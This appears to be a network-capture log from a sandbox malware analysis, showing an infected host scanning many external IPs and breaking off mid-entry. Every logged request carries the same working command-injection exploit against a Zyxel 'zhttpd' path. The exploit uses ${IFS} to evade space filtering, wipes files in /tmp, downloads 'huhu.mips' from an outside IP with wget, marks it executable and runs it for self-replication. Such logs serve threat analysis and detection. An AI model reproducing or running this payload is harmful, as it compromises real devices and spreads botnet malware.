                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.842647076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1906192.168.2.1340230171.248.228.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.842674017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1907192.168.2.135456470.174.118.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.842724085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1908192.168.2.135333261.34.157.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.842767000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1909192.168.2.1360080164.230.235.72443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.842842102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1910192.168.2.135051891.230.57.57443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.842878103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1911192.168.2.1349616155.232.141.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.842921019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1912192.168.2.135008272.50.152.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.842947960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1913192.168.2.1341540165.209.9.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.842981100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1914192.168.2.1340570213.190.58.48443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.843024969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1915192.168.2.135252242.254.207.54443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.843060017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1916192.168.2.1343602186.73.120.241443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.843094110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1917192.168.2.1342470121.239.110.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.843152046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1918192.168.2.135533295.62.217.117443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.843179941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1919192.168.2.1337378130.136.180.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.843240023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1920192.168.2.1347414188.203.166.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.843288898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1921192.168.2.133940296.131.35.86443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.843329906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1922192.168.2.133662096.70.199.222443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.843380928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1923192.168.2.1350178144.39.192.87443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.843414068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1924192.168.2.1360898130.37.221.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.843435049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1925192.168.2.1344510107.141.76.54443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.843492031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1926192.168.2.1336414114.246.26.36443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.843524933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1927192.168.2.135781246.135.17.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.843549967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1928192.168.2.134316666.151.223.114443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.843626022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1929192.168.2.1355152100.15.224.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.843677044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1930192.168.2.1357194148.255.214.252443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.843707085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1931192.168.2.1346440131.5.57.226443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.843746901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1932192.168.2.1351984205.85.156.68443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.843802929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1933192.168.2.133879045.108.189.149443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.843830109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1934192.168.2.134685289.16.2.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.843871117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1935192.168.2.1355730156.202.191.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.843909025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1936192.168.2.1356044173.252.149.204443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.843936920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1937192.168.2.1337322103.219.53.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.844000101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1938192.168.2.133332275.28.122.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.844028950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1939192.168.2.134700669.232.100.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.844054937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1940192.168.2.1360468187.67.173.14443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.844120026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1941192.168.2.1335774184.0.24.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.844162941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1942192.168.2.1338154120.156.190.6443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.844202042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1943192.168.2.1355828190.107.149.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.844233990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1944192.168.2.1357084169.245.98.254443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.844288111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1945192.168.2.1345714136.221.157.14443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.844324112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1946192.168.2.1346208140.243.116.181443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.844357967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1947192.168.2.135822299.158.89.159443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.844409943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1948192.168.2.133997837.114.182.77443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.844449997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1949192.168.2.133298649.126.238.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.844496012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1950192.168.2.134031620.114.234.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.844535112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1951192.168.2.1354968150.135.12.218443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.844568968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1952192.168.2.133984840.197.92.145443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.844590902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1953192.168.2.1336480131.133.91.11443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.844656944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1954192.168.2.135790293.5.33.21443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.844708920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1955192.168.2.1336120154.77.71.197443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.844748974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1956192.168.2.134047050.41.82.197443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.844795942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1957192.168.2.135579034.203.116.236443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.844827890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1958192.168.2.1344130126.245.89.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.844866037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1959192.168.2.1342758137.137.20.124443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.844908953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1960192.168.2.1346768102.45.221.9443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.844949007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1961192.168.2.1334720213.37.108.82443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.844980001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1962192.168.2.133328289.113.6.184443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.845010042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1963192.168.2.1342402129.140.26.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.845051050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1964192.168.2.133996234.207.218.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.845089912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1965192.168.2.134953680.178.99.151443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.845129967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1966192.168.2.1340606189.39.231.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.845163107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1967192.168.2.1353016108.20.162.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.845194101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1968192.168.2.135219661.176.137.221443
                                                  TimestampBytes transferredDirectionData
